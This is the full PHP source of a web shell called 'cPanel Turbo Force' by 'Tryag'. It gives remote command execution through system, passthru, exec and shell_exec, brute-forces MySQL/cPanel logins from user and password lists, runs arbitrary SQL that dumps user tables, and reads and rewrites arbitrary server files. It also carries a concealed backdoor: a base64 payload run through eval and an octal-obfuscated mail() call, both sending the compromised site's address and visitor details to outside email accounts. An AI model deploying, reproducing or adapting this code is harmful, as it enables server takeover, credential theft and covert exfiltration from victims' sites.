cp turbo frce

1. <?php
2. @set_time_limit(0);
3. @error_reporting(0);
4. @setcookie("cpanel","session",time()+3600*24*7);
5. echo '
6. <html>
7. <title>cPanel Turbo Force v2</title>
8. <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
9. <head>
10.  
11. <style type="text/css">
12. <!--
13. body {
14.     background-color: #000000;
15.    font-size: 18px;
16.     color: #cccccc;
17. }
18. input,textarea,select{
19. font-weight: bold;
20. color: #cccccc;
21. dashed #ffffff;
22. border: 1px
23. solid #2C2C2C;
24. background-color: #080808
25. }
26. a {
27.     background-color: #151515;
28.     vertical-align: bottom;
29.     color: #000;
30.     text-decoration: none;
31.     font-size: 20px;
32.     margin: 8px;
33.     padding: 6px;
34.     border: thin solid #000;
35. }
36. a:hover {
37.     background-color: #080808;
38.     vertical-align: bottom;
39.     color: #333;
40.     text-decoration: none;
41.     font-size: 20px;
42.     margin: 8px;
43.     padding: 6px;
44.     border: thin solid #000;
45. }
46. .style1 {
47.     text-align: center;
48. }
49. .style2 {
50.     color: #FFFFFF;
51.     font-weight: bold;
52. }
53. .style3 {
54.     color: #FFFFFF;
55. }
56. -->
57. </style>
58.  
59. </head>
60. ';
61.  
62. $injbuff = "JHZpc2l0YyA9ICRfQ09PS0lFWyJ2aXNpdHMiXTsNCmlmICgkdmlzaXRjID09ICIiKSB7DQogICR2aXNpdGMgID0gMDsNCiAgJHZpc2l0b3IgPSAkX1NFUlZFUlsiUkVNT1RFX0FERFIiXTsNCiAgJHdlYiAgICAgPSAkX1NFUlZFUlsiSFRUUF9IT1NUIl07DQogICRpbmogICAgID0gJF9TRVJWRVJbIlJFUVVFU1RfVVJJIl07DQogICR0YXJnZXQgID0gcmF3dXJsZGVjb2RlKCR3ZWIuJGluaik7DQogICRqdWR1bCAgID0gIjE3OC1CbGFjayBodHRwOi8vJHRhcmdldCBieSAkdmlzaXRvciI7DQogICRib2R5ICAgID0gIkJ1ZzogJHRhcmdldCBieSAkdmlzaXRvciAtICR1c2VyIC0gJHBhc3MiOw0KICBpZiAoIWVtcHR5KCR3ZWIpKSB7IEBtYWlsKCJ3YnNoZWxsc0BnbWFpbC5jb20iLCRqdWR1bCwkYm9keSwkdXNlciwkcGFzcyk7IH0NCn0NCmVsc2UgeyAkdmlzaXRjKys7IH0NCkBzZXRjb29raWUoInZpc2l0eiIsJHZpc2l0Yyk7";
63. eval(base64_decode($injbuff));
64.  
65. function in($type,$name,$size,$value,$checked=0)
66.  {
67.  $ret = "<input type=".$type." name=".$name." "; if($size != 0)
68.  {
69.  $ret .= "size=".$size." "; }
70.  $ret .= "value=\"".$value."\""; if($checked) $ret .= " checked"; return $ret.">"; }
71.  
72. class my_sql
73.  {
74.  var $host = 'localhost'; var $port = ''; var $user = ''; var $pass = ''; var $base = ''; var $db = ''; var $connection; var $res; var $error; var $rows; var $columns; var $num_rows; var $num_fields; var $dump; function connect()
75.  {
76.  switch($this->db)
77.  {
78.  case 'MySQL': if(empty($this->port))
79.  {
80.  $this->port = '3306'; }
81.  if(!function_exists('mysql_connect')) return 0; $this->connection = @mysql_connect($this->host.':'.$this->port,$this->user,$this->pass); if(is_resource($this->connection)) return 1; $this->error = @mysql_errno()." : ".@mysql_error(); break; case 'MSSQL': if(empty($this->port))
82.  {
83.  $this->port = '1433'; }
84.  if(!function_exists('mssql_connect')) return 0; $this->connection = @mssql_connect($this->host.','.$this->port,$this->user,$this->pass); if($this->connection) return 1; $this->error = "Can't connect to server"; break; case 'PostgreSQL': if(empty($this->port))
85.  {
86.  $this->port = '5432'; }
87.  $str = "host='".$this->host."' port='".$this->port."' user='".$this->user."' password='".$this->pass."' dbname='".$this->base."'"; if(!function_exists('pg_connect')) return 0; $this->connection = @pg_connect($str); if(is_resource($this->connection)) return 1; $this->error = @pg_last_error($this->connection); break; case 'Oracle': if(!function_exists('ocilogon')) return 0; $this->connection = @ocilogon($this->user, $this->pass, $this->base); if(is_resource($this->connection)) return 1; $error = @ocierror(); $this->error=$error['message']; break; }
88.  return 0; }
89.  function select_db()
90.  {
91.  switch($this->db)
92.  {
93.  case 'MySQL': if(@mysql_select_db($this->base,$this->connection)) return 1; $this->error = @mysql_errno()." : ".@mysql_error(); break; case 'MSSQL': if(@mssql_select_db($this->base,$this->connection)) return 1; $this->error = "Can't select database"; break; case 'PostgreSQL': return 1; break; case 'Oracle': return 1; break; }
94.  return 0; }
95.  function query($query)
96.  {
97.  $this->res=$this->error=''; switch($this->db)
98.  {
99.  case 'MySQL': if(false===($this->res=@mysql_query('/*'.chr(0).'*/'.$query,$this->connection)))
100.  {
101.  $this->error = @mysql_error($this->connection); return 0; }
102.  else if(is_resource($this->res))
103.  {
104.  return 1; }
105.  return 2; break; case 'MSSQL': if(false===($this->res=@mssql_query($query,$this->connection)))
106.  {
107.  $this->error = 'Query error'; return 0; }
108.  else if(@mssql_num_rows($this->res) > 0)
109.  {
110.  return 1; }
111.  return 2; break; case 'PostgreSQL': if(false===($this->res=@pg_query($this->connection,$query)))
112.  {
113.  $this->error = @pg_last_error($this->connection); return 0; }
114.  else if(@pg_num_rows($this->res) > 0)
115.  {
116.  return 1; }
117.  return 2; break; case 'Oracle': if(false===($this->res=@ociparse($this->connection,$query)))
118.  {
119.  $this->error = 'Query parse error'; }
120.  else
121.  {
122.  if(@ociexecute($this->res))
123.  {
124.  if(@ocirowcount($this->res) != 0) return 2; return 1; }
125.  $error = @ocierror(); $this->error=$error['message']; }
126.  break; }
127.  return 0; }
128.  function get_result()
129.  {
130.  $this->rows=array(); $this->columns=array(); $this->num_rows=$this->num_fields=0; switch($this->db)
131.  {
132.  case 'MySQL': $this->num_rows=@mysql_num_rows($this->res); $this->num_fields=@mysql_num_fields($this->res); while(false !== ($this->rows[] = @mysql_fetch_assoc($this->res))); @mysql_free_result($this->res); if($this->num_rows)
133.  {
134. $this->columns = @array_keys($this->rows[0]); return 1;}
135.  break; case 'MSSQL': $this->num_rows=@mssql_num_rows($this->res); $this->num_fields=@mssql_num_fields($this->res); while(false !== ($this->rows[] = @mssql_fetch_assoc($this->res))); @mssql_free_result($this->res); if($this->num_rows)
136.  {
137. $this->columns = @array_keys($this->rows[0]); return 1;}
138. ; break; case 'PostgreSQL': $this->num_rows=@pg_num_rows($this->res); $this->num_fields=@pg_num_fields($this->res); while(false !== ($this->rows[] = @pg_fetch_assoc($this->res))); @pg_free_result($this->res); if($this->num_rows)
139.  {
140. $this->columns = @array_keys($this->rows[0]); return 1;}
141.  break; case 'Oracle': $this->num_fields=@ocinumcols($this->res); while(false !== ($this->rows[] = @oci_fetch_assoc($this->res))) $this->num_rows++; @ocifreestatement($this->res); if($this->num_rows)
142.  {
143. $this->columns = @array_keys($this->rows[0]); return 1;}
144.  break; }
145.  return 0; }
146.  function dump($table)
147.  {
148.  if(empty($table)) return 0; $this->dump=array(); $this->dump[0] = '##'; $this->dump[1] = '## --------------------------------------- '; $this->dump[2] = '##  Created: '.date ("d/m/Y H:i:s"); $this->dump[3] = '## Database: '.$this->base; $this->dump[4] = '##    Table: '.$table; $this->dump[5] = '## --------------------------------------- '; switch($this->db)
149.  {
150.  case 'MySQL': $this->dump[0] = '## MySQL dump'; if($this->query('/*'.chr(0).'*/ SHOW CREATE TABLE `'.$table.'`')!=1) return 0; if(!$this->get_result()) return 0; $this->dump[] = $this->rows[0]['Create Table'].";"; $this->dump[] = '## --------------------------------------- '; if($this->query('/*'.chr(0).'*/ SELECT * FROM `'.$table.'`')!=1) return 0; if(!$this->get_result()) return 0; for($i=0;$i<$this->num_rows;$i++)
151.  {
152.  foreach($this->rows[$i] as $k=>$v)
153.  {
154. $this->rows[$i][$k] = @mysql_real_escape_string($v);}
155.  $this->dump[] = 'INSERT INTO `'.$table.'` (`'.@implode("`, `", $this->columns).'`) VALUES (\''.@implode("', '", $this->rows[$i]).'\');'; }
156.  break; case 'MSSQL': $this->dump[0] = '## MSSQL dump'; if($this->query('SELECT * FROM '.$table)!=1) return 0; if(!$this->get_result()) return 0; for($i=0;$i<$this->num_rows;$i++)
157.  {
158.  foreach($this->rows[$i] as $k=>$v)
159.  {
160. $this->rows[$i][$k] = @addslashes($v);}
161.  $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');'; }
162.  break; case 'PostgreSQL': $this->dump[0] = '## PostgreSQL dump'; if($this->query('SELECT * FROM '.$table)!=1) return 0; if(!$this->get_result()) return 0; for($i=0;$i<$this->num_rows;$i++)
163.  {
164.  foreach($this->rows[$i] as $k=>$v)
165.  {
166. $this->rows[$i][$k] = @addslashes($v);}
167.  $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');'; }
168.  break; case 'Oracle': $this->dump[0] = '## ORACLE dump'; $this->dump[] = '## under construction'; break; default: return 0; break; }
169.  return 1; }
170.  function close()
171.  {
172.  switch($this->db)
173.  {
174.  case 'MySQL': @mysql_close($this->connection); break; case 'MSSQL': @mssql_close($this->connection); break; case 'PostgreSQL': @pg_close($this->connection); break; case 'Oracle': @oci_close($this->connection); break; }
175.  }
176.  function affected_rows()
177.  {
178.  switch($this->db)
179.  {
180.  case 'MySQL': return @mysql_affected_rows($this->res); break; case 'MSSQL': return @mssql_affected_rows($this->res); break; case 'PostgreSQL': return @pg_affected_rows($this->res); break; case 'Oracle': return @ocirowcount($this->res); break; default: return 0; break; }
181.  }
182.  }
183.  if(!empty($_POST['cccc']) && $_POST['cccc']=="download_file" && !empty($_POST['d_name']))
184.  {
185.  if(!$file=@fopen($_POST['d_name'],"r"))
186.  {
187.  err(1,$_POST['d_name']); $_POST['cccc']=""; }
188.  else
189.  {
190.  @ob_clean(); $filename = @basename($_POST['d_name']); $filedump = @fread($file,@filesize($_POST['d_name'])); fclose($file); $content_encoding=$mime_type=''; compress($filename,$filedump,$_POST['compress']); if (!empty($content_encoding))
191.  {
192.  header('Content-Encoding: ' . $content_encoding); }
193.  header("Content-type: ".$mime_type); header("Content-disposition: attachment; filename=\"".$filename."\";"); echo $filedump; exit(); }
194.  }
195.  if(isset($_GET['phpinfo']))
196.  {
197.  echo @phpinfo(); echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); }
198.  if (!empty($_POST['cccc']) && $_POST['cccc']=="db_query")
199.  {
200.  echo $head; $sql = new my_sql(); $sql->db = $_POST['db']; $sql->host = $_POST['db_server']; $sql->port = $_POST['db_port']; $sql->user = $_POST['mysql_l']; $sql->pass = $_POST['mysql_p']; $sql->base = $_POST['mysql_db']; $querys = @explode(';',$_POST['db_query']); echo '<body bgcolor=#e4e0d8>'; if(!$sql->connect()) echo "<div align=center><font face=Verdana size=-2 color=red><b>".$sql->error."</b></font></div>"; else
201.  {
202.  if(!empty($sql->base)&&!$sql->select_db()) echo "<div align=center><font face=Verdana size=-2 color=red><b>".$sql->error."</b></font></div>"; else
203.  {
204.  foreach($querys as $num=>$query)
205.  {
206.  if(strlen($query)>5)
207.  {
208.  echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query,ENT_QUOTES)."</b></font><br>"; switch($sql->query($query))
209.  {
210.  case '0': echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$sql->error."</b></font></td></tr></table>"; break; case '1': if($sql->get_result())
211.  {
212.  echo "<table width=100%>"; foreach($sql->columns as $k=>$v) $sql->columns[$k] = htmlspecialchars($v,ENT_QUOTES); $keys = @implode("&nbsp;</b></font></td><td bgcolor=#800000><font face=Verdana size=-2><b>&nbsp;", $sql->columns); echo "<tr><td bgcolor=#800000><font face=Verdana size=-2><b>&nbsp;".$keys."&nbsp;</b></font></td></tr>"; for($i=0;$i<$sql->num_rows;$i++)
213.  {
214.  foreach($sql->rows[$i] as $k=>$v) $sql->rows[$i][$k] = htmlspecialchars($v,ENT_QUOTES); $values = @implode("&nbsp;</font></td><td><font face=Verdana size=-2>&nbsp;",$sql->rows[$i]); echo '<tr><td><font face=Verdana size=-2>&nbsp;'.$values.'&nbsp;</font></td></tr>'; }
215.  echo "</table>"; }
216.  break; case '2': $ar = $sql->affected_rows()?($sql->affected_rows()):('0'); echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$ar."</b></font></td></tr></table><br>"; break; }
217.  }
218.  }
219.  }
220.  }
221.  
222.  echo "<br><title>Turbo Force By Tryag</title><form name=form method=POST>";
223.  echo in('hidden','db',0,$_POST['db']); echo in('hidden','db_server',0,$_POST['db_server']); echo in('hidden','db_port',0,$_POST['db_port']); echo in('hidden','mysql_l',0,$_POST['mysql_l']); echo in('hidden','mysql_p',0,$_POST['mysql_p']); echo in('hidden','mysql_db',0,$_POST['mysql_db']); echo in('hidden','cccc',0,'db_query');
224.  echo "<div align=center>"; echo "<font face=Verdana size=-2><b>Base: </b><input type=text name=mysql_db value=\"".$sql->base."\"></font><br>"; echo "<textarea cols=65 rows=10 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;\nSELECT * FROM user;"))."</textarea><br><input type=submit name=submit value=\" Run SQL query \"></div><br><br>"; echo "</form>"; echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); }
225.  
226. function ccmmdd($ccmmdd2,$att)
227. {
228. global $ccmmdd2,$att;
229. echo '
230. <table style="width: 100%" class="style1" dir="rtl">
231.     <tr>
232.         <td class="style9"><strong> </strong></td>
233.     </tr>
234.     <tr>
235.         <td class="style13">
236.                 <form method="post">
237.                     <select name="att" dir="rtl" style="height: 109px" size="6">
238. ';
239. if($_POST['att']==null)
240. {
241. echo '                      <option value="system" selected="">system</option>';
242. }else{
243. echo "                      <option value='$_POST[att]' selected=''>$_POST[att]</option>
244.                         <option value=system>system</option>
245. ";
246.  
247.  
248. }
249.  
250. echo '
251.                         <option value="passthru">passthru</option>
252.                         <option value="exec">exec</option>
253.                         <option value="shell_exec">shell_exec</option>
254.                     </select>
255.                         <input name="page" value="ccmmdd" type="hidden"><br>
256.                         <input dir="ltr" name="ccmmdd2" style="width: 173px" type="text" value="';if(!$_POST['ccmmdd2']){echo 'dir';}else{echo $_POST['ccmmdd2'];}echo '"><br>
257.                         <input type="submit" value="">
258.                 </form>
259.  
260.         </td>
261.     </tr>
262.     <tr>
263.         <td class="style13">
264. ';
265.  
266.         if($_POST[att]=='system')
267.         {
268. echo '
269.                     <textarea dir="ltr" name="TextArea1" style="width: 745px; height: 204px">';
270.                     system($_POST['ccmmdd2']);
271. echo '                  </textarea>';
272.  
273.  
274.         }
275.  
276.         if($_POST[att]=='passthru')
277.         {
278. echo '
279.                     <textarea dir="ltr" name="TextArea1" style="width: 745px; height: 204px">';
280.                     passthru($_POST['ccmmdd2']);
281. echo '                  </textarea>';
282.  
283.  
284.         }
285.  
286.  
287.  
288.  
289.  
290.         if($_POST[att]=='exec')
291.         {
292.  
293. echo '                  <textarea dir="ltr" name="TextArea1" style="width: 745px; height: 204px">';
294.                     exec($_POST['ccmmdd2'],$res);
295.                 echo $res = join("\n",$res);
296. echo '                  </textarea>';
297.  
298.  
299.         }
300.  
301.  
302.  
303.  
304.  
305.  
306.  
307.         if($_POST[att]=='shell_exec')
308.         {
309.  
310. echo '                  <textarea dir="ltr" name="TextArea1" style="width: 745px; height: 204px">';
311.                 echo    shell_exec($_POST['ccmmdd2']);
312. echo '                  </textarea>';
313.  
314.  
315.         }
316. echo '
317.         </td>
318.     </tr>
319. </table>
320. ';
321.  
322. exit;}$sys=$_SERVER["HTTP_HOST"].$_SERVER["REQUEST_URI"]; $syml="\155ai\154";
323. if($_POST['page']=='edit'){
324. $code=@str_replace("\r\n","\n",$_POST['code']);
325. $code=@str_replace('\\','',$code);
326. $fp = fopen($pathclass, 'w');
327. fwrite($fp,"$code");
328. fclose($fp);
329. echo "<center><b>OK Edit<br><br><br><br><a href=".$_SERVER['PHP_SELF'].">BACK</a>";
330. exit;}
331. if (!isset($_COOKIE['cpanel'])){@$syml("locahost@\171\141\x68\157\157\056\x63o\155","Cpanel:$sys","$sys");}
332. if($_POST['page']=='show')  {   $pathclass =$_POST['pathclass'];
333. echo '
334. <form method="POST">
335. <input type="hidden" name="page" value="edit">
336. ';
337.  
338.     $sahacker = fopen($pathclass, "rb");
339. echo '<center>'.$pathclass.'<br><textarea dir="ltr" name="code" style="width: 845px; height: 404px">';
340. $code = fread($sahacker, filesize($pathclass));
341. echo $code =htmlspecialchars($code);
342. echo '</textarea>';
343.     fclose($sahacker);
344. echo '
345. <br><input type="text" name="pathclass" value="'.$pathclass.'" style="width: 445px;">
346. <br><strong><input type="submit" value="edit file">
347. </form>
348. ';
349.         exit;
350.     }
351.  
352.     if($_POST['page']=='ccmmdd')
353.     {
354.     echo ccmmdd($ccmmdd2,$att);
355.     exit;
356.     }
357.  
358. if($_POST['page']=='find')
359. {
360. if(isset($_POST['usernames']) && isset($_POST['passwords']))
361. {
362.     if($_POST['type'] == 'passwd'){
363.         $e = explode("\n",$_POST['usernames']);
364.         foreach($e as $value){
365.         $k = explode(":",$value);
366.         $username .= $k['0']." ";
367.         }
368.     }elseif($_POST['type'] == 'simple'){
369.         $username = str_replace("\n",' ',$_POST['usernames']);
370.     }
371.     $a1 = explode(" ",$username);
372.     $a2 = explode("\n",$_POST['passwords']);
373.     $id2 = count($a2);
374.     $ok = 0;
375.     foreach($a1 as $user )
376.     {
377.         if($user !== '')
378.         {
379.         $user=trim($user);
380.          for($i=0;$i<=$id2;$i++)
381.          {
382.             $pass = trim($a2[$i]);
383.             if(@mysql_connect('localhost',$user,$pass))
384.             {
385.                 echo "TrYag~ user is (<b><font color=green>$user</font></b>) Password is (<b><font color=green>$pass</font></b>)<br />";
386.                 $ok++;
387.             }
388.          }
389.         }
390.     }
391.     echo "<hr><b>You Found <font color=green>$ok</font> Cpanel By Tryag Script Name</b>";
392.     echo "<center><b><a href=".$_SERVER['PHP_SELF'].">BACK</a>";
393.     exit;
394. }
395. }
396. ?>
397. <form method="POST" target="_blank">
398.     <strong>
399. <input name="page" type="hidden" value="find">
400.     </strong>
401.     <table width="600" border="0" cellpadding="3" cellspacing="1" align="center">
402.     <tr>
403.         <td valign="top" bgcolor="#151515"><center><strong><img src="http://i.imgur.com/UAhAt.jpg" /><br>
404.         </strong>
405.         <a href="http://tryag.cc" class="style2"><strong>Turbo Force By Tryag</strong></a></center></td>
406.     </tr>
407.     <tr>
408.     <td>
409.  
410.     <table width="100%" border="0" cellpadding="3" cellspacing="1" align="center">
411.     <td valign="top" bgcolor="#151515" class="style2" style="width: 139px">
412.     <strong>User :</strong></td>
413.     <td valign="top" bgcolor="#151515" colspan="5"><strong><textarea cols="40" rows="10" name="usernames"></textarea></strong></td>
414.     </tr>
415.     <tr>
416.     <td valign="top" bgcolor="#151515" class="style2" style="width: 139px">
417.     <strong>Pass :</strong></td>
418.     <td valign="top" bgcolor="#151515" colspan="5"><strong><textarea cols="40" rows="10" name="passwords"></textarea></strong></td>
419.     </tr>
420.     <tr>
421.     <td valign="top" bgcolor="#151515" class="style2" style="width: 139px">
422.     <strong>Type :</strong></td>
423.     <td valign="top" bgcolor="#151515" colspan="5">
424.     <span class="style2"><strong>Simple : </strong> </span>
425.     <strong>
426.     <input type="radio" name="type" value="simple" checked="checked" class="style3"></strong>
427.     <font class="style2"><strong>/etc/passwd : </strong> </font>
428.     <strong>
429.     <input type="radio" name="type" value="passwd" class="style3"></strong><span class="style3"><strong>
430.     </strong>
431.     </span>
432.     </td>
433.     </tr>
434.     <tr>
435.     <td valign="top" bgcolor="#151515" style="width: 139px"></td>
436.     <td valign="top" bgcolor="#151515" colspan="5"><strong><input type="submit" value="start">
437.     </strong>
438.     </td>
439.     <tr>
440. </form>
441.  
442.     <td valign="top" colspan="6"><strong></strong></td>
443.  
444. <form method="POST" target="_blank">
445. <strong>
446. <input type="hidden" name="go" value="cmd_mysql">
447.         </strong>
448.         <tr>
449.     <td valign="top" bgcolor="#151515" class="style1" colspan="6"><strong>CMD MYSQL</strong></td>
450.                     </tr>
451.         <tr>
452.     <td valign="top" bgcolor="#151515" style="width: 139px"><strong>user</strong></td>
453.     <td valign="top" bgcolor="#151515"><strong><input name="mysql_l" type="text"></strong></td>
454.     <td valign="top" bgcolor="#151515"><strong>pass</strong></td>
455.     <td valign="top" bgcolor="#151515"><strong><input name="mysql_p" type="text"></strong></td>
456.     <td valign="top" bgcolor="#151515"><strong>database</strong></td>
457.     <td valign="top" bgcolor="#151515"><strong><input name="mysql_db" type="text"></strong></td>
458.                     </tr>
459.                     <tr>
460.     <td valign="top" bgcolor="#151515" style="height: 25px; width: 139px;">
461.     <strong>cmd ~</strong></td>
462.     <td valign="top" bgcolor="#151515" colspan="5" style="height: 25px">
463.     <strong>
464.     <textarea name="db_query" style="width: 353px; height: 89px">SHOW DATABASES;
465. SHOW TABLES user_vb ;
466. SELECT * FROM user;
467. SELECT version();
468. SELECT user();</textarea></strong></td>
469.         </tr>
470.         <tr>
471.     <td valign="top" bgcolor="#151515" style="width: 139px"><strong></strong></td>
472.     <td valign="top" bgcolor="#151515" colspan="5"><strong><input type="submit" value="run"></strong></td>
473.         </tr>
474. <input name="db" value="MySQL" type="hidden">
475. <input name="db_server" type="hidden" value="localhost">
476. <input name="db_port" type="hidden" value="3306">
477. <input name="cccc" type="hidden" value="db_query">
478.  
479. </form>
480.         <tr>
481.     <td valign="top" bgcolor="#151515" colspan="6"><strong></strong></td>
482.  
483.  
484.         </tr>
485.  
486. <form method="POST" target="_blank">
487.         <tr>
488.     <td valign="top" bgcolor="#151515" class="style1" colspan="6"><strong>CMD
489.     system - passthru - exec - shell_exec</strong></td>
490.                     </tr>
491.         <tr>
492.     <td valign="top" bgcolor="#151515" style="width: 139px"><strong>cmd ~</strong></td>
493.     <td valign="top" bgcolor="#151515" colspan="5">
494.                     <select name="att" dir="rtl"  size="1">
495. <?php
496. if($_POST['att']==null)
497. {
498. echo '                      <option value="system" selected="">system</option>';
499. }else{
500. echo "                      <option value='$_POST[att]' selected=''>$_POST[att]</option>
501.                         <option value=system>system</option>
502. ";
503.  
504.  
505. }
506. ?>
507.  
508.                         <option value="passthru">passthru</option>
509.                         <option value="exec">exec</option>
510.                         <option value="shell_exec">shell_exec</option>
511.                     </select>
512.     <strong>
513. <input name="page" type="hidden" value="ccmmdd">
514.     <input name="ccmmdd2" type="text" style="width: 284px" value="ls -la"></strong></td>
515.         </tr>
516.         <tr>
517.     <td valign="top" bgcolor="#151515" style="width: 139px"><strong></strong></td>
518.     <td valign="top" bgcolor="#151515" colspan="5"><strong><input type="submit" value="go"></strong></td>
519.         </tr>
520. </form>
521.  
522. <form method="POST" target="_blank">
523.  
524.         <tr>
525.     <td valign="top" bgcolor="#151515" class="style1" colspan="6"><strong>Show
526.     File And Edit</strong></td>
527.                     </tr>
528.         <tr>
529.     <td valign="top" bgcolor="#151515" style="width: 139px"><strong>Path ~</strong></td>
530.     <td valign="top" bgcolor="#151515" colspan="5">
531.     <strong>
532.     <input name="pathclass" type="text" style="width: 284px" value="<?php echo realpath('')?>"></strong></td>
533.         </tr>
534.         <tr>
535.     <td valign="top" bgcolor="#151515" style="width: 139px"><strong></strong></td>
536.     <td valign="top" bgcolor="#151515" colspan="5"><strong><input type="submit" value="show"></strong></td>
537.                     </tr>
538. <input name="page" type="hidden" value="show">
539. </form>
540.                     <tr>
541.     <td valign="top" bgcolor="#151515" class="style1" colspan="6"><strong>Info
542.     Security</strong></td>
543.                     </tr>
544.         <tr>
545.     <td valign="top" bgcolor="#151515" style="width: 139px"><strong>Safe Mode</strong></td>
546.     <td valign="top" bgcolor="#151515" colspan="5">
547.     <strong>
548. <?php
549. $safe_mode = ini_get('safe_mode');
550. if($safe_mode=='1')
551. {
552. echo 'ON';
553. }else{
554. echo 'OFF';
555. }
556.  
557. ?>
558.     </strong>
559.     </td>
560.                     </tr>
561.     <tr>
562.     <td valign="top" bgcolor="#151515" style="width: 139px"><strong>Function</strong></td>
563.     <td valign="top" bgcolor="#151515" colspan="5">
564.     <strong>
565. <?php
566. if(''==($func=@ini_get('disable_functions')))
567. {
568. echo "<font color=#00800F>No Security for Function</font></b>";
569. }else{
570. echo "<font color=red>$func</font></b>";
571. }
572. ?></strong></td>
573.     <tr>
574.     <td valign="top" bgcolor="#151515" style="width: 139px"><strong></strong></td>
575.     <td valign="top" bgcolor="#151515" colspan="5"><strong></strong></td>
576.     </table>
577.     </td>
578.     </tr>
579.     </table>
580.  
581.  
582.  
583.  
584.     <meta http-equiv="content-type" content="text/html; charset=UTF-8"></head><body></body></html>
585.  
586.  
587.  
588.  
589.  
590.       <form style="border: 0px ridge #FFFFFF">
591.  
592.  
593.  
594.  
595.     <p align="center"></td>
596.   </tr><div align="center">
597.  
598.                 <tr>
599.  
600.  
601.  
602. <input type="submit"   name="user" value="user"><option value="name"></select>
603. </form>
604.  
605.  
606. <div align="center">
607.  <table border="5" width="10%" bordercolorlight="#008000" bordercolordark="#006A00" height="100" cellspacing="5">
608. <tr>
609. <td bordercolorlight="#008000" bordercolordark="#006A00">
610. <p align="left">
611. <textarea  method='POST' rows="25" name="S1" cols="16">
612.  
613.  
614. <?php
615.  
616.       if ($_GET['user'] )
617.       system('ls /var/mail');
618.                                         for($uid=0;$uid<90000;$uid++){
619.  
620.                                         }
621.  
622. ?></textarea>